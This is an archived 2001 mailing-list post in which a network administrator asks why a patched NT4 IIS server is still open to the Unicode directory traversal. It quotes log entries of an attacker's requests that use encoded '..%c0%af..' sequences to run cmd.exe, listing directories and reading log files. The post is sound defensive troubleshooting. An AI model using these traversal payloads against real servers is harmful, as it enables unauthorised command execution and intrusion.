Security Incidents mailing list archives
Web Server Folder Traversal
From: "Portnoy, Gary" <gportnoy () BELENOSINC COM>
Date: Tue, 27 Feb 2001 14:52:57 -0500
Hello, This question may have a very easy answer, but I don't know what it is, and I am a little stumped. Following the recent thread about NT compromises due to the unicode folder traversal vulnerability, I decided to double check my servers. And lo and behold, I found one that was vulnerable, however, the MS patch Q269862 has been applied to it. I am thinking WTF? So, I look through the logs, and see the following: 11:21:01 212.36.0.230 - 172.17.1.4 GET /msadc/..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c +"dir%20c:\" 200 80 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - 11:21:15 212.36.0.230 - 172.17.1.4 GET /msadc/..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c +"dir%20c:\winnt\system32\logfiles\" 200 80 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - 11:21:24 212.36.0.230 - 172.17.1.4 GET /msadc/..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c +"dir%20c:\winnt\system32\logfiles\W3SVC1\" 200 80 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - 11:21:42 212.36.0.230 - 172.17.1.4 GET /msadc/..%c0%af../..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c +"type%20c:\winnt\system32\logfiles\W3SVC1\ex001210.log" 502 80 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0) - Looks like someone has tried to take advantage of it yesterday. But I am pretty sure that I should not be seeing the Unicode characters in the logs. In the logs it should be showing up as /msadc/../../../../../../winnt/system32/whatever.exe. So, I do a default installation of IIS just to confirm: 19:09:19 10.1.1.62 GET /msdac/../../../../../../winnt/system32/cmd.exe 404 19:09:27 10.1.1.62 GET /scripts/../../../../../../winnt/system32/cmd.exe 200 Yep, that's indeed the case, then why am I seeing the above in the logs, and why am I still vulnerable, even though the patch is applied? Could this be perhaps related to the order the patches were applied, or is there some other dependency? This is NT4 SP5, with almost all the released security patches, or so I thought.... Gary Portnoy Network Administrator gportnoy () belenosinc com PGP Fingerprint: 9D69 6A39 642D 78FD 207C 307D B37D E01A 2E89 9D2C
Current thread:
- Web Server Folder Traversal Portnoy, Gary (Feb 28)
- Re: Web Server Folder Traversal Chris Keladis (Feb 28)